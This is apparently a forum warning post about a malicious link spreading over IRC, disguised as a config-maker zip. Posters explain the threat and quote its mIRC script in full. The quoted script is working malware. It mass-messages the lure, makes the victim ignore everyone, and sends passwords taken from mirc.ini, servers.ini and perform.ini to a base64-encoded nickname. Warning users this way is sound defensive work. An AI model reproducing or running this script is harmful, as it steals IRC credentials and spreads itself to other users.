www.rushed.de/

Some of you will have seen people spamming like this: "(19:46:24) (@Fusen) rushed.de/files/userdemos/189991_Rushed_NewConfigMaker.zip presented by mousesports,a-Losers and mTw!""

This is of course an malicious link, it goes through your irc ini files, amsgs the link, places people on your ignore list and more.

Just in case you did an (unusally for fusen) fusen and clicked it.

edit by fusen

btw, av's won't pick this up, as it's not a trojan so to speak, the main body of this program is like 10 lines of mirc scripting]that looks in your .ini files for passwords and then sends it to the user
bleibtgeheim

who luckily for me, wasn't online atm ;P

Quote

mIRC //.mode $me +R | .ignore *!*@* | .amsg www.rushed.de/files/userdemos/189991_Rushed_NewConfigMaker.zip presented by mousesports,a-Losers and mTw! } success //.msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14BNC found7]1:4 $readini(mirc.ini,mirc,host) - Ident: $readini(mirc.ini,ident,userid) //if ($read($mircdir $+ servers.ini, w, *BNC*)) { .msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14BNC found7]1:4 $read($mircdir $+ servers.ini,$readn) - Identd: $readini(mirc.ini,ident,userid) } //if ($read($mircdir $+ perform.ini, w, *auth*)) { .msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14Auth found7]1:4 $read($mircdir $+ perform.ini,$readn) } //if ($read($mircdir $+ perform.ini, w, *oper*)) { .msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14Oper found7]1:4 $read($mircdir $+ perform.ini,$readn) } //if ($read($mircdir $+ perform.ini, w, *identify*)) { .msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14Identify found7]1:4 $read($mircdir $+ perform.ini,$readn) } //if ($read($mircdir $+ perform.ini, w, *verify*)) { .msg $decode(YmxlaWJ0Z2VoZWlt,m) 7[14Verify found7]1:4 $read($mircdir $+ perform.ini,$readn) }